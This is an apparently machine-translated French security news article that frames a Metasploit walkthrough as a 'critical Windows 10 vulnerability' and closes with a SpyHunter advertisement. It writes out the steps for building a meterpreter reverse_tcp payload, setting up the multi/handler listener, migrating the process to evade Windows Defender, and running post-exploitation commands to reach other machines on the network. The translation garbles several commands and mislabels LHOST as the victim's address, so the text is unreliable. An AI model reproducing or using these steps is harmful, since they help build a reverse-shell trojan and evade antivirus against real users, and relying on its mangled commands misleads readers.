Accueil > Nouvelles Cyber > Fenêtres critiques 10 Vulnérabilité - Multihandler Exploit
CYBER NOUVELLES

Critique Windows 10 Vulnérabilité - Multihandler Exploit

Nom Troyen:Win32 / Swrort
Type Troyen
brève description Lire et écrire des autorisations dans Windows 10. Permet à l'attaquant d'infecter d'autres PC connectés à celui infecté.
Symptômes Apparaissant d'un fichier .exe familier.
Méthode de distribution Mails de spam. Attaques MITM, redirections malveillantes.
Outil de détection Télécharger SpyHunter, Pour voir si votre système a été affectée par de Troie:Win32 / Swrort

p15_0000Un dangereux exploit a été découvert dans Windows 10, en utilisant un Troyen:Win32 / Swrort pour contourner Windows Defender et accéder en lecture et en écriture. Anonyme chercheur a démontré la vulnérabilité d'un canal, appelé Metasploitstation. Il montre 3 phases dans lequel vous pouvez glisser passé de Windows 10 défenses. Il n'y avait pas d'informations découvert à ce jour si cet exploit a été fixé ou pas.

Fenêtres 10 Multihandler Exploit Infection – Comment faire?

Dans la vidéo,, l'utilisateur de tech-savvy a démontré une simulation d'un fichier «123.EXE» qu'il crée et exécute comme si elle a été ouverte dans le monde réel en tant que pièce jointe à un e-mail ou exécuté par une autre méthode. Nous avons décidé de diviser le processus d'infection en trois phases pour vous aider à mieux comprendre la méthodologie.

Phase 1: Préparation des fichiers

Le pirate crée une charge utile avec cette configuration dans un environnement Linux:

msfpaayload fenêtres / mètre préternaturel / reverse_tcp LHOST = LPORT = x> / home / mais New dossier / / 123.EXE

portnumber1 * – Ceci est le port utilisé pour l'attaque. Il peut être un port (4444, 4324, etc). Nous avons portnumber1 écrit depuis qu'il utilise un second portnumber que nous avons nommé après.

Après cette phase est terminée et que le fichier est créé par l'attaquant et est tombé sur le système de l'utilisateur, l'attaquant peut passer à la phase 2.

Phase 2: Utilisation de l'exploit.

À ce point, l'attaquant Multihandler utilise pour faire afficher le .exe et profiter de l'exploit pour ouvrir une session active(relier) à la victime PC.

Cela peut se produire en utilisant les lignes de commande de courant:

msfconsole (Pour démarrer la console. Ouvre 'msf>' Interface)

Dans "msf" l'attaquant peut exécuter les commandes suivantes:

msf> utilisation exploiter / multi / gestionnaire
set lhost 'adresse IP victime’
Set lport 'portnumber1’

Après cela, l'attaquant exécute la charge utile pour établir une session:

msfexploit(maître)> Régler la charge utile des fenêtres / mètre préternaturel / reverse_tcp

Pour vérifier si une session active est possible, l'attaquant écrit la commande msfexploit(maître)> Afficher les options qui lui permettent de voir ce

→processus EXITFUNC oui technique de sortie(accepté: seh, fil..)
LHOST victime adresse IP oui Le port d'écoute
LPORT portnumber1 oui L'écouter adresse

Cela lui permet de voir qu'il configuré correctement les paramètres et peut procéder à l'infection réelle de l'ordinateur.

Phase 3: Infection

La commande que l'attaquant utilise pour ouvrir une session active avec la victime est 'exploit'. Après l'exécution de cette commande, le fichier '123.EXE' revint avec cette réponse:

[*] gestionnaire inverse Démarré le
[*] Démarrage du gestionnaire de charge utile…

À ce point, l'exécutable a été lancé sur la machine Windows. En dépit du fait que le logiciel Windows Defender est en cours d'exécution, cela n'a pas empêché l'attaque. Toutefois, lorsque l'analyse antivirus, le programme antivirus de Windows immédiatement détecté "123.EXE" comme un cheval de Troie:Win32 / Swrort.A.

Pour éviter la détection, l'attaquant a utilisé une tactique, appelé migration qui a créé un fichier 'notepad.exe' qui migre de la session active de '123.EXE' à ce fichier lors de la connexion. Cela a été fait en utilisant la commande:

mètre préternaturel> postal / windows / gérer / migrate exécuter

Après avoir migré le processus et en répétant la même simulation mais en utilisant (port différent), l'attaquant était à nouveau. Cette fois, quand l'attaquant a obtenu dans le PC, il n'a pas été détecté, même après Windows Defender a fait un scan et le fichier '123.EXE' était encore présent sur l'ordinateur.

De là, l'attaquant a démontré complet en lecture et écrit autorisations en créant un nouveau dossier avec un nouveau document de texte. Pour autant que nous savons que les principales commandes qui peuvent être utilisées après la connexion sont:

> Sysinfo - pour afficher la version du système et de l'information.
> dir :/ – d'ouvrir un répertoire cible.
> Shell - pour afficher la version Windows et d'autres informations.
> Getwid - montre de Windows ID.
> Ps -aux - affiche tous les fichiers .exe en cours d'exécution dans le Gestionnaire des tâches de Windows.
> Ifconfig - affiche des informations sur les interfaces (adresses IP et d'autres informations). Cette commande donne à l'attaquant les informations pour se connecter à un autre ordinateur qui est dans le même NIC et VLAN avec le PC infecté. Cela peut être très dévastateur pour les réseaux domestiques ou de bureau en cas de telles attaques est bien organisé.

Fenêtres 10 Les exploits – Conclusion

Il n'y a aucune information réelle sur si oui ou non cet exploit a été fixé, mais comme avec tout autre logiciel, il peut y avoir d'autres plus à découvert. Voilà pourquoi, dans le cas où vous utilisez Windows 10, nous vous recommandons de télécharger et installer le programme de protection contre les malwares avancés. Il vous protégera et se mettre à jour régulièrement avec les dernières menaces activement. Aussi, ce programme a boucliers actifs qui détectent immédiatement les connexions non autorisées.

donload_now_250
Spy Hunter scanner ne détecte que la menace. Si vous voulez que la menace d'être retiré automatiquement, vous devez acheter la version complète de l'outil anti-malware.En savoir plus sur l'outil SpyHunter Anti-Malware / Comment désinstaller SpyHunter

Berta Bilbao

Berta est un chercheur dédié logiciels malveillants, rêver pour un cyber espace plus sûr. Sa fascination pour la sécurité informatique a commencé il y a quelques années, quand un malware lui en lock-out de son propre ordinateur.

Plus de messages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont marqués *

Partager sur Facebook Partager
Loading ...
Partager sur Twitter Tweet
Loading ...
Partager sur Google Plus Partager
Loading ...
Partager sur Linkedin Partager
Loading ...
Partager sur Digg Partager
Partager sur Reddit Partager
Loading ...
Partager sur Stumbleupon Partager
Loading ...